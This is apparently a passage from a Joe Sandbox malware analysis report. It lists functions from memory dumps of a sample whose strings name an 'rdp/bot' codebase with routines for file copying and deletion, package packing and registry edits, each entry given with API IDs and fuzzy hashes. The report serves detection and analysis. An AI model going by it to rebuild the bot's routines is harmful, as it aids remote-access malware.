                                                                                                                  • Instruction Fuzzy Hash: 2CF06223A08A4641EB52DF91BC403BB625CAF407B4F880275DD5D466E0EF2DFA8A9300
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1125407320-0
                                                                                                                  • Opcode ID: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
                                                                                                                  • Instruction ID: 69d349ec2354feecd37689dda6babd7a83ac35163cdaf8cdb01f2b1b81e62e9d
                                                                                                                  • Opcode Fuzzy Hash: c057402851dca6842acfeb53d5f4bd6522ef3f82a611d58142259f483ab9c493
                                                                                                                  • Instruction Fuzzy Hash: 0F318121E0DE03C2FB389F3BA884AB826596F45378F1023F1E47E466F6DE6CA5455641
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671266228.00007FFE1A4F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE1A4F0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671229600.00007FFE1A4F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671305284.00007FFE1A502000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671340874.00007FFE1A50B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671373759.00007FFE1A50E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671406476.00007FFE1A50F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671434906.00007FFE1A512000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a4f0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1125407320-0
                                                                                                                  • Opcode ID: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
                                                                                                                  • Instruction ID: bf52267081cd66e1804df2d4a27fe0542c71075cb41a6a705bdbc840b45159ab
                                                                                                                  • Opcode Fuzzy Hash: f4ae83479aff9af60f2a3b692e6c9872380cd6d8c1b389a7cbdcba70c0553c8d
                                                                                                                  • Instruction Fuzzy Hash: EA313C60F0CF4282F720576BA9942B92290AF42F31F2463F3D4BD466F5CE3CA5659A41
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2671492944.00007FFE1A521000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2671469595.00007FFE1A520000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671532727.00007FFE1A533000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671563458.00007FFE1A534000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671595910.00007FFE1A53D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671627336.00007FFE1A540000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671653548.00007FFE1A541000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2671680913.00007FFE1A544000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe1a520000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1125407320-0
                                                                                                                  • Opcode ID: b67d90b2c3accd995777715e01952dbc7cf2395bdc8511a2816b0710a16cbd58
                                                                                                                  • Instruction ID: 81059c9d3f4eff34fcefa0abe8db836d3ff545e556542b15e1a2b3f9d44d1007
                                                                                                                  • Opcode Fuzzy Hash: b67d90b2c3accd995777715e01952dbc7cf2395bdc8511a2816b0710a16cbd58
                                                                                                                  • Instruction Fuzzy Hash: 75310825F0CE02D2F6209BA6E8842792252AF82F70F2007F7D47D46BF2DE2DB545A651
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1125407320-0
                                                                                                                  • Opcode ID: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
                                                                                                                  • Instruction ID: 4edbf8d922d78bcf2900c0422808e4de4d64ef2d5f6cff6bf1c539c86d85f0bc
                                                                                                                  • Opcode Fuzzy Hash: f2979eb66c59284bde3ecee25df94b5ff5ff0c8ae82d3456804992588ae00f14
                                                                                                                  • Instruction Fuzzy Hash: FE311C20E0CE0282F7709BA7E8D527C339AAF40374F1003B9D47D46AF2DE2CEA459642
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleepmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1125407320-0
                                                                                                                  • Opcode ID: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
                                                                                                                  • Instruction ID: 1c72abc43b6e9cc18b6fb2a41d3e5d935696c32c6dff2f1f8d110b64a96afa5b
                                                                                                                  • Opcode Fuzzy Hash: 90bf4d7274da88051de7ba236e3790971acd11ed8b2ecc5597919f091d7b9e59
                                                                                                                  • Instruction Fuzzy Hash: 4E31E920A0CE03C2FB319BAAAC8537B225AAF44774F9017B5D47D866F5DE2CF945A640
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF7C1AB1FD0: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF7C1AB162F), ref: 00007FF7C1AB1FEE
                                                                                                                  • SleepEx.KERNEL32 ref: 00007FF7C1AB1A51
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModuleSleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1071907932-0
                                                                                                                  • Opcode ID: 6c356b81076ccd229cca5aeae758b78700b84b5aa9c7c0a5a2da4613d1651c2a
                                                                                                                  • Instruction ID: 8225a8da091b60065633cb906fb054d4471ecc74c15a1f682232c564730fa789
                                                                                                                  • Opcode Fuzzy Hash: 6c356b81076ccd229cca5aeae758b78700b84b5aa9c7c0a5a2da4613d1651c2a
                                                                                                                  • Instruction Fuzzy Hash: 8001D63271C28782F390AE64F450BBDA1919B84364FD41036EE4E472C5EEECE845C360
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ServiceStatus
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3969395364-0
                                                                                                                  • Opcode ID: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
                                                                                                                  • Instruction ID: 99a10efd225ecd56c1d63796206cbf09ba00c265f5c00553fc3c51854b737741
                                                                                                                  • Opcode Fuzzy Hash: e32b914f392c1bb68bce297dc10430292cf8290041b41d2df93b278c97710b2f
                                                                                                                  • Instruction Fuzzy Hash: 96D01774D1964685E704FF19E850828A260BF4D3B1FC48077C80E03330EEAC6124C720
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: rand_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 863162693-0
                                                                                                                  • Opcode ID: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
                                                                                                                  • Instruction ID: c494446af0a62c624a6c427ffc61fb8d0d9185bb6bf5048c8a5314c638446b8d
                                                                                                                  • Opcode Fuzzy Hash: d894bd9d1fefdfddca1d9388a77a24cda624f6bd6183f74499cae0a854ff162f
                                                                                                                  • Instruction Fuzzy Hash: 0FC00236A185408AD720EB24E845659A770E798318FD04161EA5D82664DA7CD61ACF14
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEnterSection
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1904992153-0
                                                                                                                  • Opcode ID: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
                                                                                                                  • Instruction ID: f213ff5a168ecc0fd63ad98f912bcbff8e50349f07615b42dd577c969936c9df
                                                                                                                  • Opcode Fuzzy Hash: e4c6a4f8fdc4c5e7e294a81c5ab1ecc696208827fd2be91c8cd57836eb3360ae
                                                                                                                  • Instruction Fuzzy Hash: B3C08C92F1AD02C3EB286BA3B885038022AAF9C320F0010B8D88E823729E5C68D84600
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$_mbscat_mbscpy$strcmp
                                                                                                                  • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                                                                                                  • API String ID: 4213218670-3699962909
                                                                                                                  • Opcode ID: a44bc367bfc9f906b4ea4f9570cd1b6a8ccdf32c3452e6cad442d2c014f808d4
                                                                                                                  • Instruction ID: ab167ef3561e38e088fa4ce96cf6141bb0320a2924f4d5ccb6a2064b38477d01
                                                                                                                  • Opcode Fuzzy Hash: a44bc367bfc9f906b4ea4f9570cd1b6a8ccdf32c3452e6cad442d2c014f808d4
                                                                                                                  • Instruction Fuzzy Hash: 5EC16B71A0C2C281FB20EE11A550BBEE751AB453A4FC44033DE4D5769ADFBDE50ACB21
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$Processstrlen$Alloc$Free_mbscpymemcpystrcmp
                                                                                                                  • String ID: %TEMP%$(entry != NULL)$(package != NULL)$(strlen(entry) <= 0xff)$C:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed to read the entry file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed to read the package file(package=%s,entry=%s,err=%08x)$[E] (%s) -> Failed(package=%s,entry=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(package=%s,entry=%s)$mem_alloc$package_pack
                                                                                                                  • API String ID: 3441874634-3100963427
                                                                                                                  • Opcode ID: 4e2109d9b56151c8ce2a8565a238e19997036d1a1133067340cc8457ac036173
                                                                                                                  • Instruction ID: 80bb041b7d42096087e6e9facd5d7870828449f409eda381654b36d518f9c11a
                                                                                                                  • Opcode Fuzzy Hash: 4e2109d9b56151c8ce2a8565a238e19997036d1a1133067340cc8457ac036173
                                                                                                                  • Instruction Fuzzy Hash: E5C16B72A0868782EB10EF55A410BBDA761BB847A4F845033DE4E47795EFFDE50AC720
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$DirectoryErrorLastRemove_mbscpystrcmp$fflushfwrite
                                                                                                                  • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                                                                                                  • API String ID: 1390976747-4087913290
                                                                                                                  • Opcode ID: 6f577c2dc94f4c40b4d41022a78535c6ed9255f5b1189d7f6429ee422dae1bcd
                                                                                                                  • Instruction ID: 4bee93af09ca2b0087f6bad2fd2d09f59d7824b57534a1456b894df805495c53
                                                                                                                  • Opcode Fuzzy Hash: 6f577c2dc94f4c40b4d41022a78535c6ed9255f5b1189d7f6429ee422dae1bcd
                                                                                                                  • Instruction Fuzzy Hash: 8DA18831A0C6C2C5FB20EF15A854BBEE791AB853A4FD44033C94E57685EEBDE805CB20
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenValuefflushfwrite
                                                                                                                  • String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
                                                                                                                  • API String ID: 716145365-86941537
                                                                                                                  • Opcode ID: 470b11bc8360a5496df4d954e5ea8c3597ecfc0ab49a46faaa1b91ca81e1339b
                                                                                                                  • Instruction ID: e06ca7a0a7275f96bb006c13ea56137912234e6c42c84737dbe3d9492baf56ac
                                                                                                                  • Opcode Fuzzy Hash: 470b11bc8360a5496df4d954e5ea8c3597ecfc0ab49a46faaa1b91ca81e1339b
                                                                                                                  • Instruction Fuzzy Hash: 3D812DB190C78A85FB70FF15A850B7DE290AF46764EC40133CD1D47BA5EE9DA988C329
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseDeleteOpenValuefflushfwrite
                                                                                                                  • String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                                                                                  • API String ID: 3240087161-1026589300
                                                                                                                  • Opcode ID: eba5de4cb462e848e7f028c86fadf832435605f6f1f254ff393ef4948b05702c
                                                                                                                  • Instruction ID: de351e7402e2b99ba157152f8e712c390f4a9e9f9ab4fdce2c411d84c63bc70e
                                                                                                                  • Opcode Fuzzy Hash: eba5de4cb462e848e7f028c86fadf832435605f6f1f254ff393ef4948b05702c
                                                                                                                  • Instruction Fuzzy Hash: B1813DB090C78B81FB60FF44A850BBDE254AF00764EC44133CD5E877A5EEADA985C329
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$_mbscpy
                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                  • API String ID: 3496426206-1059260517
                                                                                                                  • Opcode ID: ba93c12478b578e71c53bdc271007d691fffedd76ab810d95978edcfdf11af81
                                                                                                                  • Instruction ID: 106d98e89d39a794193fd63c7e54380661f55aad9c2f2439dd15b6143b4560e8
                                                                                                                  • Opcode Fuzzy Hash: ba93c12478b578e71c53bdc271007d691fffedd76ab810d95978edcfdf11af81
                                                                                                                  • Instruction Fuzzy Hash: 9F716D31B0C6C28AFB60FF15A850FBD9690AB46BA8F940133DD0F07795DEADA845C321
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEnumOpen
